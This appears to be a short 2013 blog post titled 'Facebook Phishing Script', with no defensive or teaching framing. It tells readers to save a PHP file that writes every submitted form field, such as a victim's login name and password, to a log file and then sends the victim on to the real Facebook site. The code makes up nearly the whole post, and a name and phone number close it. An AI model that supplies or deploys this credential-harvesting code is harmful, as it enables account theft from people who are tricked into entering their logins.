Friday, 16 August 2013

Facebook Phishing Script 

Just copy the below script in notepad and save it as anyname.php

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?

Lathiya Prakash....Call Me Any Time 7405280612